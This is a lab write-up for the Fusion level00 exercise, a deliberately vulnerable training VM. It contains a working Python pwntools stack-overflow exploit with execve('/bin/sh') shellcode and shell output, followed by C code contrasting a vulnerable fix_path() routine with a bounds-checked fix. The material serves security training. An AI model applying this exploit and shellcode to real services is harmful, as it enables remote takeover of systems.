Fusion Level00
- There aren't any memory protections, not even NX, so I just use shellcode.
- The service listens on port 20000, and be careful with the socket 'fd'.
- There is a stack buffer overflow vulnerability in fix_path().
- RET -> 140 ~ 143
```python
# Python 2 / pwntools exploit script for Fusion level00
from pwn import *

# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

s = remote('192.168.56.136', 20000)
# The service leaks the stack buffer address in its banner; parse it
buf = int((s.recv(1024).split(' '))[4], 16)
print "[+] Buffer at %s" % hex(buf)

payload = "GET "
payload += "A"*139
payload += p32(buf + 158)  # ret -> to shellcode
payload += " HTTP/1.1"
payload += sc
s.send(payload)
s.interactive()
```
```text
zero@ubuntu:~/Desktop$ python fusion0.py
[+] Opening connection to 192.168.56.136 on port 20000: Done
[+] Buffer at 0xbf919b88
[*] Switching to interactive mode
$ id
uid=20000 gid=20000 groups=20000
```
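For contrast, here is an added example (constructed for this write-up, not the level's own source) of the fix_path() bug pattern the notes above point at: an assumed realpath() into a fixed 128-byte stack buffer, beside a bounds-checked version that refuses to copy back a result that does not fit the caller's buffer. The function names, the 128-byte size and the sample paths are assumptions.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed shape of the vulnerable routine (constructed, not the level's
 * source): realpath() may write up to PATH_MAX bytes, but 'resolved' holds
 * only 128, so a long request path runs past the buffer into the saved
 * frame pointer and return address of fix_path(). Shown for contrast only;
 * it is never called here. */
int fix_path_vulnerable(char *path)
{
    char resolved[128];
    if (realpath(path, resolved) == NULL)
        return 1;                       /* cannot resolve the path */
    strcpy(path, resolved);             /* copy back, unbounded */
    return 0;
}

/* Hardened version: let realpath() allocate a result of the right size
 * (POSIX.1-2008 allocating form), then copy it back only if it fits the
 * caller's buffer of 'cap' bytes. Returns 0 on success, 1 if the path does
 * not resolve, -1 if the result would not fit; 'path' is untouched on error. */
int fix_path_safe(char *path, size_t cap)
{
    char *resolved = realpath(path, NULL);
    if (resolved == NULL)
        return 1;
    size_t need = strlen(resolved) + 1;     /* include the terminating NUL */
    int rc = -1;
    if (need <= cap) {
        memcpy(path, resolved, need);
        rc = 0;
    }
    free(resolved);
    return rc;
}

int main(void)
{
    char path[1024] = "/..";            /* constructed input; resolves to "/" */
    int rc = fix_path_safe(path, sizeof path);
    printf("rc=%d path=%s\n", rc, path);
    return rc;
}
```

The same check applies to any caller that hands fix_path() a buffer: the capacity, not the input length, decides whether the resolved path may be written back.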